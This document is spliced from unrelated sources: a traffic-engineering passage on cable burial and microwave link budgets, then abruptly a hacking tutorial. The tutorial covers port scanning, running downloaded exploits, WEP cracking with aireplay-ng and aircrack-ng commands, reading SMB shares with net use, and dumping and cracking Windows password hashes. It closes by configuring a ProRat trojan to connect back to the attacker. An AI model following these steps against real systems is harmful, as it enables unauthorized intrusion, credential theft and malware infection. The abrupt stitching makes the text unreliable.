The lowest set of lines must be placed at least 15 feet above grade. If there is not enough room to accommodate all valid users, it is necessary to raise the height of the pole. The last user is responsible for paying the cost of installing the extension or taller pole and moving all users to their appropriate position.
Using existing utility poles can be very expensive. Cable can be buried directly in soil using one of two general construction methods: open trench construction, or cable plow.
In both instances, a cable rated for direct burial should be used. These cables are designed with a metallic armor sheath to prevent damage from rodents that may try to chew through the cable. The direct burial method is especially useful in rural and suburban locations.
The non-paved portion of a rural road or highway right-of-way is a good candidate for this construction method. The route must be carefully planned, taking care to avoid other buried utilities (water, electrical, telephone, gas, etc.).
Using the open trench construction method, a backhoe is used to dig a 36 inch deep trench. The cable is laid and the trench is backfilled with an appropriate material to prevent cable bends due to settlement, up to a level of 24 inches. A yellow warning tape is then laid in the trench before completing the fill to terrain level. The 36 inch depth is an average; the cable should always be buried below the frost line, and the actual depth may vary at road crossings or at drainage ditch and drainage line crossings.
The object is to keep the cable out of harm's way. A second direct bury construction method uses a plow to open the earth, lay the cable and then cover. This is an economical and efficient construction method. However, no warning tape is installed. Use of these methods does not eliminate the need to consider placement of slack cable and access handholes. There will always be a need to add communication devices and access nodes to a system.
Direct buried cable is always identified at the road level using orange marker poles. The poles have information indicating that communication cable is buried below together with contact information in case of damage to the cable.
Markers should be placed at regular intervals along the route, and on either side of every road crossing, driveway crossing and bridge crossing. A variant of the direct bury cable construction method is direct burial of flexible conduit. If plans call for installation of additional fiber cables in the same route within a few years, burying flexible tube conduit together with the initial cable provides significant savings over re-opening a trench.
When "Level 3" needs to install additional fiber cable in their route, the flexible tube conduit can be used to minimize construction costs. This method also reduces traffic congestion due to construction. Placing cable in conduit is the most expensive solution for constructing a fiber optic cable route. Starting from scratch requires a significant amount of planning, especially in urban areas where most conduit is used. All utilities in or near the proposed construction path must be located and marked.
The path may have to be realigned to avoid some of the utilities, or a proposal developed to temporarily interrupt service and then repair the damaged utility lines. Environmental issues must be addressed. Where construction is proposed for existing streets or roads, repair and restoration costs must be considered. Maintenance and protection of vehicular and pedestrian traffic must be implemented. The conduit structure must be designed to meet bending radius requirements of the communication cable.
This helps to prevent cable drag when pulling through the conduit. Cable installed in conduit should be rated for immersion in water. All in-ground conduit eventually contains some water.
Cables designed for this purpose are constructed with a sealant that prevents water from penetrating the fiber or copper transmission media. If the conduit is buried at a depth of greater than three feet, it may be necessary to dig a trench that is wide enough to allow space for construction personnel.
Trenching at a depth of more than six feet will require shoring walls (see local construction codes for specific requirements) to prevent collapse and injury to construction personnel. Most conduit used for telecommunications cable projects is high density polyethylene (HDPE), manufactured to a common dimensional standard.
That standard was developed to assure that conduit from different manufacturers could be used interchangeably, with assurance that the inside and outside diameters of the conduit pipe and the thickness of the conduit wall would match.
Some DOTs may require the use of steel conduit for bridge crossings or other types of construction. Using appropriate couplings, steel and HDPE can be mixed. HDPE is lighter in weight and easier to handle than steel; however, under certain loading circumstances it may not be as rigid.
Wireless media are used to support communication links between devices and the TCC. This is often viewed as a low cost alternative to the installation of communication cable. Many departments are using spread spectrum radio in the 900 MHz and 2.4 GHz unlicensed bands.
This section will focus on mounting of radio antennas and transmission line for "line-of-sight" also called microwave radio systems. These are the systems commonly used for traffic control and freeway management.
The design and construction of towers and poles is completed within standard civil engineering practices and local codes. This also holds true for building mounted antenna supporting structures. System planning is critical to the successful installation, operation and proper performance of any communication system; wireless systems are no exception, and this is especially true for line-of-sight microwave. Unless your proposed microwave link will be operating over a very long path, you should be able to confirm whether a visible line-of-sight path exists between the two proposed antenna sites.
This is only a first step, and is often accomplished by using a combination of strobe lights, mirrors (which reflect the sun), binoculars and spotting scopes. Being able to see one site from the other will not guarantee that the visible path is appropriate for a microwave signal, but at least you will know that the possibility of such a path exists.
High frequency radios, such as those used in Spread Spectrum Radio require line-of-sight between antennas. In many instances there may be obstacles to overcome such as buildings, trees, small hills and elevated roads, and it may not be possible to confirm that line-of-sight exists without additional aid.
Keep in mind that even a "perfectly clear" visual path may not actually be so. As an example, small branches of deciduous trees, barren in the winter, may not be visible until spring or summer when growth appears. Even the skeleton of a new building may not be visible until the sides go up! Establishing line-of-sight for traffic signal systems should be easy to accomplish because of the short distances involved (a few blocks).
When establishing line-of-sight, it is extremely important to plan for the future. In urban areas, new building construction may result in total path obstruction.
In areas where construction is not anticipated, the rapid growth of trees or foliage may severely affect the path over time. While a number of software products are available for assisting with path work, combining a topographical mapping of the path with a subsequent path walk or drive is often an excellent way to start the line-of-sight confirmation process. Assuming an appropriate line-of-sight path from radio site to radio site can be established, both the feasibility and viability of a point-to-point microwave radio link will be dependent upon the gains, losses and receiver sensitivity corresponding with the system.
Gains are associated with the transmitter power output of the radio, and the gains of both the transmitting and receiving antennas. Losses are associated with the cabling between the radios and their respective antennas, and with the path between the antennas.
Other losses can also occur if the path is partially obstructed, or if path reflections cancel a portion of the normal receive signal. Manufacturers will state the RF power output and gain for each of their products. Radio transmitters are described in terms of power output expressed in watts; the same figure may also be expressed in dBm (decibels relative to one milliwatt), which is the form used in link calculations. Radio receivers are rated in terms of sensitivity, the ability to receive a minimal signal, listed in milliwatts (mW) or, more usefully, in dBm.
Antenna cable is rated in terms of signal loss per foot, expressed as dB of loss per foot. The antenna is rated in terms of gain (dBi, decibels relative to an isotropic radiator). There are a number of software programs that will calculate path loss by frequency and use the specifications of the system hardware to help determine the overall system feasibility. One of the first items to consider for any microwave path is the actual distance from antenna to antenna.
The further a microwave signal must travel, the greater the signal loss. This form of attenuation is termed free space loss (FSL). Assuming an unobstructed path, only two variables need to be considered in FSL calculations: the path length and the operating frequency.
Because free space loss rises with frequency, a signal transmitted at 6 GHz arrives with more power than the same signal transmitted at 11 GHz over the same path. For example, a microwave system at 6 GHz can expect to cover about 25 miles between communication points, while the same system using a frequency of 11 GHz will only cover about 10 miles (rain attenuation, which becomes significant above about 10 GHz, shortens the usable path further). When RF energy is transmitted from a parabolic antenna, the energy spreads outward, much like the beam from a flashlight.
This microwave beam can be influenced by the terrain between the antennas, as well as by objects in or along the path. When the centerline of a beam from one antenna to another antenna just grazes an obstacle along the path, some level of signal loss will occur due to diffraction.
The amount of signal loss can vary dramatically, influenced by the physical characteristics and the distance of the object from the antenna. A microwave beam can also be reflected by water or relatively smooth terrain, very much in the same way a light beam can be reflected from a mirror. Again, since the wavelength of a microwave beam is much longer than that of a visible light beam, the criteria for defining "smooth terrain" is quite different between the two.
While a light beam may not reflect well off of an asphalt road, a dirt field, a billboard, or the side of a building, to a microwave beam these can all be highly reflective surfaces. Even gently rolling country can prove to be a good reflector. A microwave beam arriving at an antenna could effectively be canceled by its own "mid-path" reflection, causing tremendous signal loss. Long microwave paths can also be affected by atmospheric refraction, the result of variations in the dielectric constant of the atmosphere.
For relatively short 2.4 GHz paths, the effects of atmosphere and earth curvature will not usually come into play, so the engineering of these paths is quite straightforward. For long or unusual paths, however, all aspects of path engineering must be considered. Interference Issues — Spread spectrum microwave radio systems are among the most interference tolerant communication networks in use today. Spread spectrum signals are relatively difficult to detect and, by their nature, are resistant to jamming and narrowband interference.
That tolerance has a limit. As more and more signals are transmitted in the band, the noise level in the band increases accordingly, and once the noise reaches a certain level communication in the band is effectively negated. In the U.S. the band is unlicensed and shared, so while these links are usually able to spread out (and thereby reject) narrowband interference, other spread spectrum signals in the 2.4 GHz band are not rejected in the same way; they simply raise the noise floor.
It is extremely difficult to predict the effect of an interfering signal unless specific information is known about the interferer. In general, other spread spectrum signals in the 2.4 GHz band should be treated as an unpredictable source of noise. For this reason, even when working with paths which are very short and not subject to any sort of fading condition, a fade margin of 15 dB or greater should always be maintained for the path.
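The gains, losses, free space loss and fade margin described above combine into one link budget. The following Python is an added worked example, not part of this handbook: it uses the standard free space loss equation (distance in km, frequency in MHz) and a plain dBm budget, and checks the result against the 15 dB minimum margin given above. The sample radio (1 W transmitter, -85 dBm receiver, 3 dB of coax loss at each end) and the two sample paths are constructed for illustration, not figures for any particular product.

```python
import math

MILES_TO_KM = 1.609344
MIN_FADE_MARGIN_DB = 15.0   # minimum margin recommended in the text above


def watts_to_dbm(power_w: float) -> float:
    """Transmitters are specified in watts; link budgets are easier in dBm."""
    return 10.0 * math.log10(power_w * 1000.0)


def free_space_loss_db(distance_km: float, freq_mhz: float) -> float:
    """Free space loss on an unobstructed path (Friis form).

    Only two variables matter: path length and frequency.  Doubling either
    one adds about 6 dB of loss.
    """
    return 20.0 * math.log10(distance_km) + 20.0 * math.log10(freq_mhz) + 32.44


def link_budget(tx_dbm, tx_gain_dbi, rx_gain_dbi, cable_loss_db,
                distance_km, freq_mhz, rx_sensitivity_dbm,
                required_margin_db=MIN_FADE_MARGIN_DB):
    """Receive level = gains - losses; fade margin = receive level - sensitivity."""
    fsl = free_space_loss_db(distance_km, freq_mhz)
    rx_level = tx_dbm + tx_gain_dbi + rx_gain_dbi - cable_loss_db - fsl
    margin = rx_level - rx_sensitivity_dbm
    return {
        "fsl_db": round(fsl, 2),
        "rx_level_dbm": round(rx_level, 2),
        "fade_margin_db": round(margin, 2),
        "viable": margin >= required_margin_db,
    }


def band_penalty_db(low_mhz: float, high_mhz: float) -> float:
    """Extra free space loss from moving the same path to a higher band."""
    return 20.0 * math.log10(high_mhz / low_mhz)


def demo():
    # Constructed sample radio: 1 W transmitter, -85 dBm receiver sensitivity,
    # 3 dB of coax loss at each end.  Hypothetical numbers, not a product.
    tx_dbm = watts_to_dbm(1.0)          # 30 dBm
    cable_loss = 3.0 + 3.0
    good = link_budget(tx_dbm, 24.0, 24.0, cable_loss,
                       5.0 * MILES_TO_KM, 2400.0, -85.0)   # 24 dBi dishes, 5 miles
    poor = link_budget(tx_dbm, 8.0, 8.0, cable_loss,
                       12.0 * MILES_TO_KM, 2400.0, -85.0)  # 8 dBi panels, 12 miles
    return good, poor


if __name__ == "__main__":
    good, poor = demo()
    print("dishes, 5 miles :", good)
    print("panels, 12 miles:", poor)
    print("6 -> 11 GHz penalty on the same path: %.2f dB" % band_penalty_db(6000, 11000))
```

The first path clears the 15 dB margin by a wide amount; the second lands just below the receiver's sensitivity and is not viable even before any fading or interference is counted, which is the situation the 15 dB rule is meant to keep you out of.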
All RF systems have an antenna or several in an array. The transponder used in a vehicle for toll collection has an antenna. The fact that it can't be seen doesn't mean that it isn't present.
The antenna is built in-to the package. A cost comparison of all the elements that make up a radio system would show the antenna as the lowest cost piece.
However, most of the problems that a radio system may have can be traced to either improper installation, or improper selection, of the antenna.
You could narrow down the number of results by adding a specific word after it. This search could list several emails that are published on the website.
Now that the basics of footprinting have been explained, we will move on to port scanning. Once a hacker knows all the services running on your server, he could search for possible vulnerabilities they may have and exploit them to take control of your website. In the port scanning example we will use the most popular port scanner, Nmap, through its graphical front end Zenmap. First the hacker would choose a target and place it in the target box.
This is what the command would look like if you were running the CLI version. A smart hacker would go with a quick and quiet scan (for example a plain SYN scan, nmap -sS, with a slow timing template such as -T2) rather than a noisy one.
Full version detection scans (nmap -sV) are very loud and could raise suspicion on the other end. Stay away from those options because, as you will see later on, there are other ways to get that information. A sample scan result may look like the following. As you can see it found a few open ports and listed the services that run on them.
Along with finding out which ports are open, the hacker also needs to find out what operating system the server is running. There are always a lot of operating system vulnerabilities out there to choose from. As you can see, Nmap has an option to detect the operating system (-O), but this scan is very loud and easily detected, so it is better to avoid it if possible. A simple way to determine what the server is running is by requesting a page that does not exist and reading the error page: on many sites the default error page displays the web server software and its version, and sometimes the operating system as well.
Now that the hacker has all the running services and open ports on the target's system, he will have to find out what versions the server is running. One way the hacker can get this information is to telnet into the service port and read the banner it sends. If you are on a Mac, you will be using the terminal. Note: If you are using Windows Vista, then telnet is not installed by default; it can be added as an optional Windows feature.
Once the telnet command is installed, the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit.
As you can see on the chart above, port 21 is FTP. To find out what FTP software is running he would use telnet by running the command: telnet localhost 21. A hacker would insert the target hostname or IP address in place of localhost. It connects to the target and displays a banner telling the hacker the software and its version, as shown below.
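The banner grab described above, as an added example that is not code from the eBook: the Python below does what "telnet host 21" does by hand (connect, send nothing, read the greeting line) and then pulls the product name and version out of the FTP 220 reply. So that it runs offline, it starts a stand-in FTP listener on loopback that sends one constructed banner; the daemon name "ExampleFTPd 1.2.3" is hypothetical.

```python
import re
import socket
import threading

# Constructed banner for a stand-in FTP daemon; the product name and version
# are hypothetical, chosen only so the example runs offline.
CONSTRUCTED_BANNER = b"220 ExampleFTPd 1.2.3 Server ready.\r\n"

# FTP greets with a 220 reply; many daemons put their name and version in it.
FTP_BANNER_RE = re.compile(
    r"^220[ -](?P<product>[A-Za-z][\w.-]*)\s+(?P<version>\d+(?:\.\d+)+)")


def start_fake_ftp(banner: bytes = CONSTRUCTED_BANNER) -> int:
    """Listen on a random loopback port, send one banner to the first client, exit."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    """What 'telnet host 21' shows: connect, send nothing, read the greeting line."""
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            while not data.endswith(b"\n") and len(data) < 1024:
                chunk = s.recv(256)
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass                      # some services never greet; return what we have
    return data.decode("latin-1", "replace").strip()


def parse_ftp_banner(banner: str):
    """Pull (product, version) out of a 220 greeting, or None if it is not there."""
    m = FTP_BANNER_RE.match(banner)
    return (m.group("product"), m.group("version")) if m else None


def demo():
    port = start_fake_ftp()
    banner = grab_banner("127.0.0.1", port)
    return banner, parse_ftp_banner(banner)


if __name__ == "__main__":
    banner, parsed = demo()
    print("banner :", banner)
    print("parsed :", parsed)
```

The same check is worth running against your own hosts from the defender's side: anything it returns is what an attacker gets for free without a noisy -sV scan, and most daemons let you replace the version string in the greeting with something uninformative.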
This is the information the hacker needs to continue and begin searching for vulnerabilities in the software discovered. Searching for Vulnerabilities: Now that the hacker has the name of the software being used and its version number, he would take that information and search a couple of vulnerability databases for an exploit. If a skillful hacker is determined, he may try to locate a vulnerability in the current software version and develop an exploit for it himself.
You might be wondering why 0-days are worth so much. Denial-of-Service (DoS) — There are many types of DoS attacks, but they all have one purpose: to make the target server unavailable to legitimate users. The most common type of DoS attack is when the hacker sends a flood of traffic to the target server, causing it to use up all of its resources and either go offline or deny requests from legitimate users trying to access it.
Buffer Overflow (BoF) — A buffer overflow happens when a program attempts to store more data into a buffer, or data storage area, than it was meant to hold. Because the buffer was only meant to hold a certain amount of data, the extra information overflows into the adjacent memory and overwrites whatever was stored there: other variables, and on the stack the saved return address that tells the program where to continue executing. The attacker crafts the overflowing input so that the overwritten data redirects execution into code of his choosing.
Once this code is executed, the hacker can receive full control of the server. Exploits are also classed as local or remote. Below are their definitions: Remote Exploit — A remote exploit is run over the network against a listening service and requires no prior account on the machine. Local Exploit — To run a local exploit, you must first have access and privileges on the machine.
Local exploits are usually used to escalate one's privileges to admin or root. In other words, it allows an ordinary user to gain root privileges. A hacker usually has to use a combination of both remote and local exploits to gain full control of a system. For example, the hacker may have been able to gain regular privileges with a remote exploit, and then escalate to root privileges with the help of a local exploit.
Penetrating: So now you might be wondering: once the hacker finds the right exploit, how does he go about running it against the target and penetrating the server? This will all be explained in this chapter. As you search Milw0rm or any of the other exploit database websites provided in this chapter, you will notice that the exploits are written in many different programming languages.
Below I will list a few of the most common programming languages used, and how a hacker would compile and run them against a server. Below are the steps the hacker would take. First the hacker would need to install PHP onto his computer. Every exploit is different: some require you to know what to edit, and some print runtime instructions.
Next open up the command prompt (or terminal if you are using a Mac), and go to the PHP directory by using the cd (change directory) command followed by the directory location. You should get a couple of errors; the above is a simple example. Also, every now and then you will receive other errors such as the one the second picture shows above.
These errors have to do with the server configuration. Now, as a hacker, you have to learn a lot on your own. Going around asking simple questions like this all the time will make you look bad, and the most common response you will receive is: www.
Google is your friend, so take advantage of it! So starting now, begin to use Google, and if you are still stuck, then you can ask for help on community forums. Once the errors are fixed and the program is running, a DoS attack will be launched against the target website and continue until you exit the command window. Eventually the server may go down completely. Perl: Download and install the appropriate version of ActivePerl.
Next the hacker would find an exploit for the vulnerability. This is also a Denial of Service (DoS) exploit. Edit the options such as the target server as needed and run it; the attack has begun. Python — Python is also a common programming language used in creating exploits. The steps to running a Python exploit are just as easy as the ones for Perl.
Hint: Python files end with .py. You can usually find the runtime instructions commented at the top of the script. Exploits written in a compiled language must be built first; below is a list of the most popular compilers for each operating system. Cygwin is a Linux-like environment that runs in Windows and acts as a Linux emulation layer, allowing you to compile and run Linux programs in Windows.
Open up Terminal. You should see the following screen. Open the exploit file in vi and press i; you are now in insert mode. Right click and paste in the exploit. The script should now be pasted in. Press Escape and type :wq, which quits and saves the document as exploit. Now type in the command: ls. This command lists all the files in the current directory. You should see your newly made file in the list. Next install the package the exploit needs with the package manager (apt-get on Ubuntu); this command downloads the package and then asks you if you would like to continue with installing.
It will then install the package automatically. If no error was displayed, then it was successful. Running the exploit with no arguments will display a little note telling you how to run it against a server. The image below shows all of these steps together; the last line of the picture shows the proper way a hacker would use the script against a server. Below is an image of what the root account on Ubuntu would look like.
In this case I am root. Cygwin: Run the installer. Choose to install from the internet. Continue on until it asks you to choose a mirror to download from; choose any. Next you must select packages to download. Expand the window so that you can see all of the columns. It will begin to install the packages.
Once it is installed, double click the desktop icon and a command prompt should come up. Running the script will display its runtime directions. Put in the right options and parameters and run the script again. The picture below shows all of these steps being done. Once a hacker runs this script against a vulnerable machine and the script works, he will have root access to the target computer.
Many exploits are created and tested in specific environments, and the expected outcome only happens when the exploit is run in the exact same environment. That is another reason why programming knowledge is needed, so you can edit the exploit script to work for you. Once a skilled hacker gains root on a server he has the ability to do a lot of damage.
Countermeasures: There are a few things you can do to stay secure from network hacking attempts. Keep all your software up to date. There will always be new vulnerabilities coming out, and it is your responsibility to install patches promptly after they are released.
Implement a firewall, and expose only the ports you actually need; a service Nmap cannot reach is a service it cannot fingerprint or attack. Install anti-virus software. Scan your system with a vulnerability scanner. This may reveal possible vulnerabilities in your system, including version banners of the kind discussed above. You can get internet access with a wireless enabled laptop almost everywhere you go. In this chapter I will discuss ways a hacker goes about getting into secure wireless networks and things he can do once he is inside. The hacker starts by scanning for wireless networks near him.
The Windows tool we will use in this section is called NetStumbler. Also, by the time you receive this eBook, MacStumbler may already be released for those of you using a Mac. Download and install NetStumbler and run it. It automatically starts to scan for wireless access points. Once it is completed, you should see a list of all the wireless access points around you. The more green and the fewer gaps, the better the signal. It provides the MAC address, channel number, encryption type, and much more.
All of these come into use when a hacker decides he wants to get into the secured network by cracking the encryption. Backtrack comes with a huge list of preloaded software for this very purpose.
Before we begin, there are a couple of requirements: 1. You need a computer with a compatible wireless adapter. 2. Download Backtrack and create a Live CD. First we will find a wireless access point along with its BSSID, ESSID and channel number. To do this we will run Kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter, which in my case is ath0. To be able to do some of the later things, your wireless adapter must be put into monitor mode.
Kismet automatically does this, and as long as you keep it open your wireless adapter will stay in monitor mode. Each flag in Kismet's list stands for a different type of encryption. In our case we will be looking for access points with WEP encryption. Once you find an access point, open a text document and paste in the network's broadcast name (ESSID), its MAC address (BSSID) and its channel number.
The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command: airodump-ng -c [channel] -w [filename] --bssid [bssid] [device]. In the above command airodump-ng starts the program, the channel of your access point goes after -c, the file you wish to output the data to goes after -w, and the MAC address of the access point goes after --bssid. The command ends with the device name. Make sure to leave out the brackets.
Leave the above running and open another terminal. Next we will associate with the target access point using fake authentication, so that it accepts the packets we inject and the rate of data output increases. Put in the following command: aireplay-ng -1 0 -a [bssid] -h [your adapter's MAC] -e [essid] [device]. In the above command we are using the aireplay-ng program.
The -1 tells the program the specific attack we wish to use, which in this case is fake authentication with the access point. The 0 is the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapter's MAC address, -e is the name (ESSID) of the target access point, and the command ends with your wireless adapter's device name.
Now, we will force the target access point to send out a huge amount of packets that we can use to attempt to crack the WEP key, by capturing an ARP request and replaying it back to the access point (the ARP request replay attack: aireplay-ng -3 -b [bssid] -h [your adapter's MAC] [device]). Once the command is executed, check your airodump-ng terminal and you should see the data packet count (the #Data column) start to increase. Once you have collected around 50k packets, you may begin the attempt to break the WEP key.
The command to begin the cracking process is: aircrack-ng -a 1 -b [bssid] [filename]-01.cap (airodump-ng appends -01 and the .cap extension to the filename you gave it; -a 1 selects WEP). This should crack the WEP key within seconds to a few minutes. The more packets you capture, the better your chance of cracking the WEP key. With all the different computers and network adapters out there, you may come across an error occasionally.
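Why the ARP replay step above is what makes WEP fall: every ARP request on the air starts with the same 16 bytes (LLC/SNAP header plus the fixed ARP header fields), WEP's IV is only 24 bits and is sent in the clear, and RC4 keystream depends only on IV || key, so a known plaintext XORed with its ciphertext hands over the keystream for that IV, which then decrypts any other frame that reused it. The Python below is an added example, not code from the eBook or from aircrack-ng: it implements RC4 and WEP framing, recovers a keystream from one "ARP" frame and decrypts a second frame under the same IV without ever touching the key. The 40-bit key, the IV and the second frame's payload are constructed for the demonstration. It does not implement aircrack's statistical key recovery, which needs this same IV material in volume; that volume is what the replay attack supplies.

```python
import zlib

IV_SPACE = 2 ** 24        # WEP's IV is 24 bits, so IVs repeat on any busy network

# LLC/SNAP header plus the fixed start of an Ethernet/IPv4 ARP request: hardware
# type 1, protocol 0x0800, lengths 6/4, opcode 1.  Every ARP request on the air
# begins with these 16 bytes, which is why an attacker knows the plaintext.
ARP_REQUEST_PREFIX = bytes.fromhex("aaaa030000000806" "0001080006040001")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key schedule + PRGA) XORed over data; encrypt and decrypt are the same."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body: IV in the clear, then RC4(IV || key) over plaintext || CRC32 ICV."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("WEP uses a 3-byte IV and a 40- or 104-bit key")
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + rc4(iv + key, plaintext + icv)


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Legitimate receiver: strip IV, run RC4 with the shared key, verify the ICV."""
    iv, body = frame[:3], frame[3:]
    pt_icv = rc4(iv + key, body)
    plaintext, icv = pt_icv[:-4], pt_icv[-4:]
    if zlib.crc32(plaintext).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return plaintext


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Attacker, no key: ciphertext XOR known plaintext = keystream for this IV."""
    body = frame[3:3 + len(known_plaintext)]
    return bytes(c ^ p for c, p in zip(body, known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Apply a recovered keystream to another frame that reused the same IV."""
    body = frame[3:3 + len(keystream)]
    return bytes(c ^ k for c, k in zip(body, keystream))


def demo():
    key = bytes.fromhex("0102030405")      # constructed 40-bit WEP key (hypothetical)
    iv = bytes.fromhex("0a0b0c")           # one IV; on a real network it comes round again
    arp_frame = wep_encrypt(key, iv, ARP_REQUEST_PREFIX)
    secret = b"secret data here"           # constructed 16-byte payload of a second frame
    other_frame = wep_encrypt(key, iv, secret)   # same IV => same keystream
    keystream = recover_keystream(arp_frame, ARP_REQUEST_PREFIX)
    return keystream, decrypt_with_keystream(other_frame, keystream)


if __name__ == "__main__":
    ks, leaked = demo()
    print("recovered keystream:", ks.hex())
    print("second frame, no key:", leaked)
```

Collect one known-plaintext frame per IV and you can decrypt the first 16 bytes of every other frame on the network without the key; replaying the ARP request thousands of times is just a way of making the access point generate those IV/keystream pairs on demand. Real WEP frames also carry a key-index byte after the IV, omitted here.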
If you get stuck, remember, Google is your friend! Packet sniffing is the act of capturing packets going through a network. With a packet sniffer, once a hacker gains access to a wireless network he can intercept private information going through it, such as usernames, passwords, IM conversations, and e-mails, whenever the application itself does not encrypt them. Download and install Wireshark. Launch it and click on the option to list the available capture interfaces, as shown below. Next choose the interface you want to capture on and click start.
A steadily growing packet count shows that the user is currently active. Now, to show you an example of how Wireshark can be used, I will start up Windows Live and send a message. As you will see in the image below, my whole conversation is captured. As you can see, my message is displayed at the bottom. If I continue down the list I can see the whole conversation.
Countermeasures: Change your router's default password and make sure you have WPA2 (or at least WPA) encryption enabled. WEP, as shown above, can be broken in minutes, but even it is better than nothing. Use a long, secure password for your router. Include numbers, lowercase letters, uppercase letters and other symbols.
The more obscure the better. Make sure your router has the option to not broadcast your SSID enabled. This will prevent some programs like NetStumbler from locating your wireless network, although a passive sniffer such as Kismet will still see it from the traffic of connected clients. Use MAC filtering on your router. Every wireless card and wireless adapter has a MAC address. By choosing to allow only your MAC addresses onto the network, you can keep casual attackers out; note that client MAC addresses are visible in the air and can be spoofed, so treat this as a speed bump rather than a lock. To prevent packet sniffing attacks from affecting you, make sure the important sites you use, like banks, use SSL (Secure Socket Layer) encryption, today superseded by TLS.
The only thing required is for the target machine to have file and printer sharing enabled and to have port 139 (the NetBIOS session service) open. First the hacker would search for a target. A common tool used by hackers is Angry IP Scanner. Download and install it. Next the hacker would insert the IP range he would like to scan. Click the downward arrow on the right and check the Scan ports box. A popup will come up asking you if you would like to select a new port.
Click YES. Type in the port number (139) into the first box and click OK. Click start. As you can see, a range of IPs was scanned. Out of those only one was alive, and luckily it has port 139 open. Without it, this attack is not possible. This means that file and printer sharing is enabled.
The net view command (net view \\<target IP>) will display any shared drives, folders, files or printers. In my case, I got the following: I have two printers shared and one disk named SharedDocs. The hacker would be able to take control of my printers and view everything in my SharedDocs disk. To gain access to my SharedDocs disk, the hacker would have to map the drive onto his computer with net use.
If successful, the hacker will have all the contents of my drive on his computer. The drive letter in the net use command (for example net use G: \\<target IP>\SharedDocs) just tells the computer what to name the drive on your computer.
Looks like I already have a drive G. To avoid this problem, go to My Computer, where it will show all of your current drives, and change the letter G to a drive letter that is not in use.
Once the command is completed successfully, go to My Computer and you should see a new drive under Network Drives. Double clicking it brings up all of the target's documents. Ophcrack is a password cracker for Windows password hashes, and it uses rainbow tables to get the job done quickly.
Windows stores a couple of types of password hashes. One of them is the LM (LAN Manager) hash. To compute it, the password is converted to all uppercase, padded with nulls to 14 characters and split into two seven-character halves; each half is used as a DES key to encrypt a fixed constant, and the two results are concatenated. Because the password is uppercased and each seven-character half can be attacked independently, the total number of different password combinations goes down significantly, which makes it easy to crack and easy to precompute rainbow tables for. So you might be wondering, how can I get a copy of those hashes?
There are a couple of ways. First download and install ophcrack. As you can see there are two versions. In this example we will be using the program itself in Windows, so download the first option. Once you have it downloaded, install it. When the option comes up to download rainbow tables, uncheck them all and just install the program. It is better to download the rainbow tables separately.
Once it is installed, go to the ophcrack website and click on Tables in the navigation. This will display all the tables you can download. As you can see, the more characters covered, the bigger the table gets.
Choose the correct table for your operating system. In the example, I chose the largest possible free table. Next run ophcrack and click on tables. Select the table you downloaded and click Install to locate the file on your computer.
Hit OK to continue. Make sure all of your anti-virus and anti-spyware programs are disabled, because most anti-virus programs flag PWDUMP as malicious: dumping password hashes from the SAM is exactly what attackers use it for. Only do this on a machine you own, and re-enable protection afterwards. This will load all the password hashes for all the users on your computer and display them. Next click Crack and the program will begin to crack the password hashes. Go to the ophcrack website and choose the correct operating system LiveCD to download.
With the downloaded ISO burned to a CD, boot the machine from it. If graphical mode fails, go into Ophcrack Text mode. Once Ophcrack loads completely, it will automatically get your Windows password hashes and begin the cracking process. Every day thousands of innocent people are getting infected by different types of malware. The most common types of malware today are viruses, worms and Trojans. In this chapter we will discuss all the types of malware, and give you an example of a Windows trojan in use.
The reason we will use Windows is that malware is much less common on Linux and Mac computers. Definitions:
Viruses — Viruses cannot spread without the help of us humans. They are like parasites because they need a host to attach themselves to. The host is usually a legitimate looking program or file. Once this program is launched, the virus is executed and infects other files on your computer. Viruses can be very destructive. They can damage your software and files, and in rare cases the hardware those files control. Viruses are spread through the sharing of files and are many times sent within emails as attachments.
Worms — A worm is a malicious program that can replicate itself onto other computers on a network without user action. Once it infects a system, it uses that system to send out other copies of itself to other random systems, attempting to infect them. Trojan Horse — A trojan horse is a malicious program disguised as something the user wants. It can be used to do silly things to a system like changing its desktop, messing with the user interface, and taking control of your mouse.
It can also be used for serious things like accessing your data, erasing your files, stealing your passwords, and capturing your keystrokes. Logic Bombs — Logic bombs are pieces of code planted in a program that lie dormant until a certain time, or until a user performs a certain action, which causes them to execute. Bacteria — Bacteria make many copies of themselves and eventually end up taking up all of the computer's resources, such as its processor power, memory and disk space.
This results in the legitimate user losing access to those resources. Blended Threats — Blended threats combine all of the characteristics of the above and use them along with system vulnerabilities to spread and infect machines. Download ProRat.
Once it is downloaded, right-click on the archive and choose to extract it. A password prompt will come up. Open up the program. Next we will create the actual trojan server file. Put in your IP address so the server can connect back to you. Then put in your e-mail address so that, if a victim gets infected, it will send you a message.
We will not be using the rest of the options. Click on the General Settings button to continue. Here we choose the server port the program will connect through, the password you will be asked to enter when connecting to an infected victim, and the victim name. As you can see, ProRat can disable the Windows firewall and hide itself from the task manager. Click on the Bind with File button to continue. Here you have the option to bind the trojan server file with another file.
